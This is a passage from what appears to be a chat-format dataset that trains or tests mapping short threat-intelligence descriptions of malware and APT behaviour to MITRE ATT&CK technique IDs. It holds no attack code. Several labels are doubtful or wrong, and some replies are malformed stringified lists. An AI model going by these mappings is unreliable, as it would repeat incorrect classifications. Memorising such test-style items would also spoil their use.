"content": "T1074.002 - Remote Data Staging" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SUNBURST added junk bytes to its C2 over HTTP." }, { "role": "assistant", "content": "T1001.001 - Junk Data" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "In the final stage of its attacks, the TeleBots group always used the KillDisk malware to overwrite files with specific file extensions on the victims’ disks. The KillDisk malware used in the first wave of December 2016 attacks, instead of encrypting, simply overwrites targeted files" }, { "role": "assistant", "content": "T1485 - Data Destruction" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "HEXANE has used `net view` to enumerate domain machines." }, { "role": "assistant", "content": "T1018 - Remote System Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Clambling has gained execution through luring victims into opening malicious files." }, { "role": "assistant", "content": "T1204.002 - User Execution: Malicious File" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "RainyDay can use scheduled tasks to achieve persistence." }, { "role": "assistant", "content": "T1053.005 - Scheduled Task/Job: Scheduled Task" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "That executes the perl script, puts it to sleep for two seconds and deletes the file to remove any evidence" }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "dumps memory from specific processes on a victim system, parses the dumped files, and scrapes them for credit card data." }, { "role": "assistant", "content": "T1005 - Data from Local System" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "is capable of downloading additional files through C2 channels, including a new version of itself." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "HttpBrowser is a remote access tool whose name originates from the hard-coded \"HttpBrowser/1.0\" User-Agent. Table 2 lists the commands available to threat actors in one of the HttpBrowser variants" }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Carbanak campaigns can also use legitimate programs and remote access software for command and control. They also employ standard non-application layer protocols for communication." }, { "role": "assistant", "content": "T1095 - Non-Application Layer Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "POSHSPY modifies timestamps of all downloaded executables to match a randomly selected file created prior to 2013." }, { "role": "assistant", "content": "T1070.006 - Indicator Removal on Host: Timestomp" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "HAFNIUM has created and granted privileges to domain accounts." }, { "role": "assistant", "content": "T1136.002 - Create Account: Domain Account" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BONDUPDATER waits to receive an instruction from the C2 server that starts with “E” before writing the downloaded data to the supplied filename. After receiving the “E” instruction, the Trojan will write the base64 decoded data to the file and process the newly created file. Figure 27 shows the C2 server providing the “E” instruction within the TXT answer. In the current example, the Trojan would treat the newly saved file as a script thanks to the filename ending with the “0” character. The Trojan would run the contents of the file using “cmd.exe” and save the output to a file named “proc10100” that will be uploaded to the C2 server." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Ursnif has gathered information about running processes." }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT37 has collected data from victims' local systems." }, { "role": "assistant", "content": "T1005 - Data from Local System" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Pay2Key has used RSA encrypted communications with C2." }, { "role": "assistant", "content": "T1573.002 - Asymmetric Cryptography" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "uses the Dropbox cloud storage service for command and control." }, { "role": "assistant", "content": "T1102 - Web Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SUNSPOT used Windows API functions such as \"MoveFileEx\" and \"NtQueryInformationProcess\" as part of the SUNBURST injection process." }, { "role": "assistant", "content": "T1106 - Native API" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "GALLIUM ensured each payload had a unique hash, including by using different types of packers." }, { "role": "assistant", "content": "T1027.005 - Indicator Removal from Tools" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "P.A.S. Webshell can delete scripts from a subdirectory of /tmp after they are run." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "A series of xor 0x28 loops decrypt the contents of a self-deletion batch file, which is then written to disk and executed. Later in the execution, a more complex rc4 loop decrypts the download url and other strings and imports" }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "RDAT has used encoded data within subdomains as AES ciphertext to communicate from the host to the C2." }, { "role": "assistant", "content": "T1001 - Data Obfuscation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Konni malware family use a custom base64 key to encode the content of several files in the exfiltration phase. We observed the same flow of data reconnaissance and exfiltration across all campaigns" }, { "role": "assistant", "content": "T1132.001 - Data Encoding: Standard Encoding" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "QakBot can identify the installed antivirus product on a targeted system." }, { "role": "assistant", "content": "T1518.001 - Software Discovery: Security Software Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Instructions within guide.txt explaining how to carry out DNS hijacking attack In one part of guide.txt, an example target appears to be provided, with a corresponding adversary IP (185.162.235[.]106) for the legitimate domain to be redirected to" }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The last one is used by this setup, and in this mode the ransomware encrypts the files on all available mapped network drives" }, { "role": "assistant", "content": "T1486 - Data Encrypted for Impact', 'T1564.006 - Run Virtual Instance" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Backdoor.Oldrea collects information about running processes." }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FIN6 has used the Stealer One credential stealer to target e-mail and file transfer utilities including FTP." }, { "role": "assistant", "content": "T1555 - Credentials from Password Stores" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The threat actors used Windows’ scheduled task and batch scripts to execute “scr.exe” and collect additional information from hosts on the network. The tool “scr.exe” is a screenshot utility that the threat actor used to capture the screen of systems across the network. The MD5 hash of “scr.exe” matched the MD5 of ScreenUtil, as reported in the Symantec Dragonfly 2.0 report" }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell', 'T1113 - Screen Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PcShare has deleted its files and components from a compromised host." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The goal of targeting some victims appears to be to obtain data. How this data is obtained likely differs per victim, but we observed the usage of several custom DLL files used to continuously retrieve data from memory of systems where such data is typically processed" }, { "role": "assistant", "content": "T1119 - Automated Collection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Metamorfo requires the user to double-click the executable to run the malicious HTA file or to download a malicious installer." }, { "role": "assistant", "content": "T1204.002 - User Execution: Malicious File" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Windows Credential Editor can dump credentials." }, { "role": "assistant", "content": "T1003.001 - OS Credential Dumping: LSASS Memory" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "GravityRAT can obtain the date and time of a system." }, { "role": "assistant", "content": "T1124 - System Time Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TEMP.Veles has planted Web shells on Outlook Exchange servers." }, { "role": "assistant", "content": "T1505.003 - Server Software Component: Web Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "identifies files with certain extensions and copies them to a directory in the user's profile." }, { "role": "assistant", "content": "T1074 - Data Staged" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Wizard Spider has exploited or attempted to exploit Zerologon (CVE-2020-1472) and EternalBlue (MS17-010) vulnerabilities." }, { "role": "assistant", "content": "T1210 - Exploitation of Remote Services" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SombRAT has the ability to respawn itself using \"ShellExecuteW\" and \"CreateProcessW\"." }, { "role": "assistant", "content": "T1106 - Native API" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FLASHFLOOD employs the same encoding scheme as SPACESHIP for data it stages. Data is compressed with zlib, and bytes are rotated four times before being XOR'ed with 0x23." }, { "role": "assistant", "content": "T1560.003 - Archive via Custom Method" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Siloscape searches for kubectl.exe by name and the config file using a regular expression. The search function takes an extra argument: a pointer to a vector that holds folder names to exclude from the search" }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "At the beginning of 2017, Silent Librarian began to regularly obtain free Let’s Encrypt SSL certificates for their phishing pages. This technique, which we have previous discussed at length in blog posts from November and December, is used to create more realistic-looking phishing pages" }, { "role": "assistant", "content": "T1588.004 - Digital Certificates" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Quickly after the initial compromise, the operator deploys a tool named \"dog.exe. This malware is written in .NET and its purpose is to monitor hard drive paths and to exfiltrate the information via an email account or an FTP, depending on the configuration. The configuration file is named dconf.json" }, { "role": "assistant", "content": "T1048 - Exfiltration Over Alternative Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "It then issues a SOAP request to delete the processed email. This completes the process in which the payload receives inbound communications from the actor" }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "exfiltrates command output and collected files to its C2 server in 1500-byte blocks." }, { "role": "assistant", "content": "T1030 - Data Transfer Size Limits" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BabyShark has cleaned up all files associated with the secondary payload execution." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "It will use an auto-run registry (HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run) named AdobeMX that will execute PowerShell to load the encoded executable via reflective loading (loading an executable from memory rather than from the system’s disks" }, { "role": "assistant", "content": "T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Operation Wocao has exfiltrated files and directories of interest from the targeted system." }, { "role": "assistant", "content": "T1005 - Data from Local System" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "downloads additional files from C2 servers." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "uses Rundll32 to ensure only a single instance of itself is running at once." }, { "role": "assistant", "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SHOTPUT has a command to list all servers in the domain, as well as one to locate domain controllers on a domain." }, { "role": "assistant", "content": "T1018 - Remote System Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Remexi takes screenshots of windows of interest." }, { "role": "assistant", "content": "T1113 - Screen Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Session Manager" }, { "role": "assistant", "content": "T1546.009 - Event Triggered Execution: AppCert DLLs" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "One, called \"frown.py,\" is responsible for the communications with the command and control (C2). It uses TLS to encrypt the communication that occurs on port 143" }, { "role": "assistant", "content": "T1571 - Non-Standard Port" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT32 has used mshta.exe for code execution." }, { "role": "assistant", "content": "T1218.005 - Signed Binary Proxy Execution: Mshta" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Kessel can RC4-encrypt credentials before sending to the C2." }, { "role": "assistant", "content": "T1560 - Archive Collected Data" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ZxShell has a feature to perform SYN flood attack on a host." }, { "role": "assistant", "content": "T1499 - Endpoint Denial of Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "gathers and beacons the username of the logged in account during installation. It will also gather the username of running processes to determine if it is running as SYSTEM." }, { "role": "assistant", "content": "T1033 - System Owner/User Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "RainyDay has used names to mimic legitimate software including \"vmtoolsd.exe\" to spoof Vmtools." }, { "role": "assistant", "content": "T1036.005 - Masquerading: Match Legitimate Name or Location" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "China Chopper's server component can spider authentication portals." }, { "role": "assistant", "content": "T1046 - Network Service Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "XAgentOSX contains the getFirefoxPassword function to attempt to locate Firefox passwords." }, { "role": "assistant", "content": "T1555.003 - Credentials from Password Stores: Credentials from Web Browsers" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FruitFly persists via a Launch Agent." }, { "role": "assistant", "content": "T1543.001 - Create or Modify System Process: Launch Agent" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT19 used an HTTP malware variant and a Port 22 malware variant to collect the MAC address and IP address from the victim’s machine." }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Kerrdown can use DLL side-loading to load malicious DLLs." }, { "role": "assistant", "content": "T1574.002 - Hijack Execution Flow: DLL Side-Loading" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "OSX_OCEANLOTUS.D has disguised its app bundle by adding special characters to the filename and using the icon for legitimate Word documents." }, { "role": "assistant", "content": "T1036.004 - Masquerading: Masquerade Task or Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "We have been tracking RDAT since 2017, when we first saw this tool uploaded to a webshell related to the TwoFace webshell discussed in our Striking Oil blog published on September 26, 2017. RDAT has been under active development since 2017, resulting in multiple variations of the tool that rely on both HTTP and DNS tunneling for C2 communications. In June 2018, the developer of RDAT added the ability to use Exchange Web Services (EWS) to send and receive emails for C2 communications. This email-based C2 channel is novel in its design, as it relies on steganography to hide commands and exfiltrates data within BMP images attached to the emails. The combination of using emails with steganographic images to carry the data across the C2 can result in this activity being much more difficult to detect and allow for higher chances of defense evasion" }, { "role": "assistant", "content": "T1071.003 - Mail Protocols', 'T1001.002 - Data Obfuscation via Steganography" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "cmd can be used to find files and directories with native functionality such as \"dir\" commands." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "used legitimate services like Google Docs, Google Scripts, and Pastebin for C2." }, { "role": "assistant", "content": "T1102 - Web Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Stuxnet checks for specific operating systems on 32-bit machines, Registry keys, and dates for vulnerabilities, and will exit execution if the values are not met." }, { "role": "assistant", "content": "T1480 - Execution Guardrails" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The r1.log file stores information for exfiltration" }, { "role": "assistant", "content": "T1074 - Data Staged" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Pillowmint has collected credit card data using native API functions." }, { "role": "assistant", "content": "T1005 - Data from Local System" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BabyShark has used mshta.exe to download and execute applications from a remote server." }, { "role": "assistant", "content": "T1218.005 - Signed Binary Proxy Execution: Mshta" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Taidoor has downloaded additional files onto a compromised host." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "OilRig has used the publicly available tool SoftPerfect Network Scanner as well as a custom tool called GOLDIRONY to conduct network scanning." }, { "role": "assistant", "content": "T1046 - Network Service Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Stuxnet attempts to impersonate an anonymous token to enumerate bindings in the service control manager." }, { "role": "assistant", "content": "T1134.001 - Access Token Manipulation: Token Impersonation/Theft" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "In previous iterations, the Astaroth Trojan campaign used cerutil to download files. In this iteration, they have replaced certutil with BITSAdmin" }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Dark Caracal leveraged a watering hole to serve up malicious code." }, { "role": "assistant", "content": "T1189 - Drive-by Compromise" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT39 has used malware to decrypt encrypted CAB files." }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Embedded Downloader Trojan The M payload (referenced previously along with the R payload, above) injected and executed within the memory space of the other process is a downloader Trojan. This specific downloader appears to have been created using a VB2Exe tool, as the functional code that carries out the downloading functionality exists as a VBScript embedded within the payload. The payload extracts this VBScript from a resource and saves it to a file that it extracts from another resource" }, { "role": "assistant", "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can download remote files onto victims." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "GravityRAT collects the victim username along with other account information (account type, description, full name, SID and status)." }, { "role": "assistant", "content": "T1033 - System Owner/User Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "CookieMiner can download additional scripts from a web server." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Chimera has used \"net localgroup administrators\" to identify accounts with local administrative rights." }, { "role": "assistant", "content": "T1069.001 - Permission Groups Discovery: Local Groups" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT29 registered devices in order to enable mailbox syncing via the \"Set-CASMailbox\" command." }, { "role": "assistant", "content": "T1098.005 - Device Registration" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "HotCroissant has attempted to install a scheduled task named “Java Maintenance64” on startup to establish persistence." }, { "role": "assistant", "content": "T1053.005 - Scheduled Task/Job: Scheduled Task" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "MegaCortex has checked the number of CPUs in the system to avoid being run in a sandbox or emulator." }, { "role": "assistant", "content": "T1497.001 - Virtualization/Sandbox Evasion: System Checks" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "During execution, the code employs byte randomization to obscure its behavior. This is achieved by using the host’s current time as a seed for a pseudorandom number generator, and then performing additional operations against that output. The resulting values are used to overwrite blocks of previously executed code. This byte manipulation is the first anti-analysis technique observed in the code, as any attempt to dump the memory segment would result in illegitimate or incorrect operations" }, { "role": "assistant", "content": "T1001.001 - Junk Data" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Before being deleted, the DLL executes a string decoding routine that is designed to execute for about a minute, spiking central processing unit (CPU) usage for the regsvr32.exe process. Once the strings are decoded, the More_eggs components are decrypted, dropped to the system (normally in the 